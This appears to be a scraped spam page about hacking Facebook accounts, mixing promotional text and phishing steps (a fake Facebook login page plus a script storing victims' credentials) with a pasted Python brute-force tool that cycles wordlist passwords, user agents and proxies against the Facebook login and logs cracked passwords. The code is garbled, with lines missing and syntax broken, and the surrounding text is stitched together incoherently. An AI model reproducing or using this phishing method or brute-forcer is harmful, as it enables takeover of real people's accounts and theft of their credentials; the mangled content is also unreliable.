Script Hack Fb

Kode script hack fb

  1. Hacker Script Hack Fb
  2. Script Hack Fb Cmd
  3. Script Hack Fb Html
Jul 6th, 2015

Hacker Script Hack Fb

Never

As you all know facebook is the most famous social networking site in the world. This position has encouraged hackers to always try to find security flaws in Facebook's system. Thanks to these flaws, hackers are able to hack any Facebook account. You can easily hack facebook accounts too by using our web-based hacking application.

Script Hack Fb Cmd

  1. Facebook Hacking Html Code Pdf. Get the pdf version of Facebook Hacking Html Code – Details of how, nowadays, users can have a Facebook account with no prior knowledge. Facebook Hacking Html Code Free Download. The below Phishing Code is only for Educational Purposes. Steps to Use this code. Go to Download Page.
  2. How to Hack Facebook Account/Password with Code 1. Make Login Page looks like Facebook Login Page. Before starting this step, first check what your targetted user like. Create Script to Store Facebook Login Credentials. Put the above file inside same directory with name login.php.
  3. How to hack a Facebook account, Step by step: If you want to hack a facebook account, the easiest way is, your one and only way to hack a facebook account for free online. Facebook hacking is a relatively difficult concept. Hacking a facebook account requires years and years of programming knowledge and knowledge to facebooks infrastructure.

Script Hack Fb Html

Not a member of Pastebin yet?Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2. # This was written for educational purpose and pentest only. Use it at your own risk.
  3. # Author will not be responsible for any damage !!
  4. # Version : 1.0
  5. # https://www.facebook.com/groups/anonymousddosers/
  6. importre
  7. importsys
  8. importwarnings
  9. try:
  10. exceptImportError:
  11. print'[*] Please install mechanize python module first'
  12. exceptKeyboardInterrupt:
  13. sys.exit(1)
  14. importcookielib
  15. print'[*] Please install cookielib python module first'
  16. exceptKeyboardInterrupt:
  17. sys.exit(1)
  18. warnings.filterwarnings(action='ignore', message='.*gzip transfer encoding is experimental!', category=UserWarning)
  19. # define variable
  20. __programmer__ ='mmmuhahaha_ <hehe.haha@gmail.com>'
  21. verbose =False
  22. usepassproxy =False
  23. file=open(log,'a')
  24. checkpoint ='checkpoint'
  25. fblogin ='https://login.facebook.com/login.php?login_attempt=1'
  26. useragent =['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
  27. 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
  28. 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
  29. 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
  30. 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
  31. 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
  32. 'Opera/8.00 (Windows NT 5.1; U; en)',
  33. 'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
  34. 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
  35. 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
  36. 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
  37. 'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
  38. facebook =''
  39. / _| | | | |
  40. | _/ _` |/ __/ _ '_ / _ / _ | |/ /
  41. |_| __,_|______|_.__/ ___/ ___/|_|_
  42. Version : %s'' % (__programmer__, __version__)
  43. Usage : %s [options]
  44. Option : -w, --wordlist <filename> | Wordlist used for bruteforcing
  45. -p, --proxy <host:port> | Set http proxy will be use
  46. -k, --usernameproxy <username> | Set username at proxy will be use
  47. -i, --passproxy <password> | Set password at proxy will be use
  48. -l, --log <filename> | Specify output filename (default : fbbruteforcer.log)
  49. '' % (sys.argv[0],sys.argv[0],sys.argv[0])
  50. Usage : %s [option]
  51. '' % sys.argv[0]
  52. def helpme():
  53. print option
  54. file.write(option)
  55. print facebook
  56. file.write(facebook)
  57. sys.exit(1)
  58. for arg insys.argv:
  59. if arg.lower()'-u'or arg.lower()'--user':
  60. username =sys.argv[int(sys.argv[1:].index(arg))+2]
  61. elif arg.lower()'-w'or arg.lower()'--wordlist':
  62. wordlist =sys.argv[int(sys.argv[1:].index(arg))+2]
  63. log =sys.argv[int(sys.argv[1:].index(arg))+2]
  64. useproxy =True
  65. elif arg.lower()'-k'or arg.lower()'--userproxy':
  66. usw =sys.argv[int(sys.argv[1:].index(arg))+2]
  67. elif arg.lower()'-i'or arg.lower()'--passproxy':
  68. usp =sys.argv[int(sys.argv[1:].index(arg))+2]
  69. elif arg.lower()'-v'or arg.lower()'--verbose':
  70. elif arg.lower()'-h'or arg.lower()'--help':
  71. eliflen(sys.argv)<=1:
  72. exceptIOError:
  73. exceptNameError:
  74. exceptIndexError:
  75. try:
  76. userEmail = word[0:pos]
  77. print('password: ' + word )
  78. file.write('[*] Trying ' + userEmail + '::' + word + 'n')
  79. rch =random.choice(useragent)
  80. # print('User Agent: ' + rch )
  81. # for form in br.forms():
  82. # print form
  83. # To show all control elements in the form
  84. # for control in br.form.controls:
  85. # print 'type=%s, name=%s value=%s' % (control.type, control.name, br[control.name])
  86. # To dump cookies data being sent and received
  87. # If email still auto-filled on login form, this script would not work as expected, so we need to release it
  88. NotMe ='notme_cuid'
  89. if(NotMe in link.url):
  90. response = br.follow_link(link)
  91. br.form['email']= userEmail
  92. br.submit()
  93. print response
  94. print'nn[*] Logging in success...'
  95. print'[*] Password : %sn' % (word)
  96. file.write('n[*] userEmail : %s' % (userEmail))
  97. # After successful login, force to Log Out (to clear the cookies & session - important!)
  98. if form.attrs['id']'logout_form':
  99. br.submit()
  100. print'nn[*] Logging in success...but stuck on checkpoint! Victim maybey has been noticed'
  101. print'[*] Password : %sn' % (word)
  102. file.write('n[*] Logging in success...but stuck on checkpoint! Victim maybey has been noticed')
  103. file.write('n[*] Password : %snn' % (word))
  104. # In checkpoint, this account may has been logged in, so we need to Log it Out after successful login
  105. for link in br.links():
  106. request = br.click_link(link)
  107. # print response.geturl()
  108. # else:
  109. print'n[*] Exiting program...n'
  110. except mechanize._mechanize.FormNotFoundError:
  111. file.write('n[*] Form Not Foundn')
  112. except mechanize._form.ControlNotFoundError:
  113. file.write('n[*] Control Not Foundn')
  114. # def dump():
  115. # print cookie.name, cookie.value
  116. def releaser():
  117. for word in words:
  118. global br
  119. # Uncomment this variable if you want to enable dump()
  120. try:
  121. cj =cookielib.LWPCookieJar()
  122. br.set_handle_equiv(True)
  123. br.set_handle_redirect(True)
  124. br.set_handle_robots(False)
  125. br.set_debug_redirects(False)
  126. br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
  127. br.set_proxies({'http': proxy})
  128. br.add_proxy_password(usw, usp)
  129. br.set_debug_http(True)
  130. br.set_debug_redirects(True)
  131. print'n[*] Exiting program...n'
  132. sys.exit(1)
  133. preventstrokes =open(wordlist,'r')
  134. count =0
  135. words[count]= words[count].strip()
  136. exceptIOError:
  137. file.write('n[*] Error: Check your wordlist pathn')
  138. exceptNameError:
  139. exceptKeyboardInterrupt:
  140. file.write('n[*] Exiting program...n')
  141. try:
  142. print'n[*] Starting attack at %s' % time.strftime('%X')
  143. #print '[*] Account for bruteforcing %s' % (username)
  144. print'[*] Bruteforcing, please wait...'
  145. file.write('n[*] Starting attack at %s' % time.strftime('%X'))
  146. #file.write('n[*] Account for bruteforcing %s' % (username))
  147. file.write('n[*] Loaded : %d words' % int(len(words)))
  148. file.write('n[*] Bruteforcing, please wait...n')
  149. print'n[*] Exiting program...n'
  150. try:
  151. bruteforce(word)
  152. helpme()
  153. if __name__ '__main__':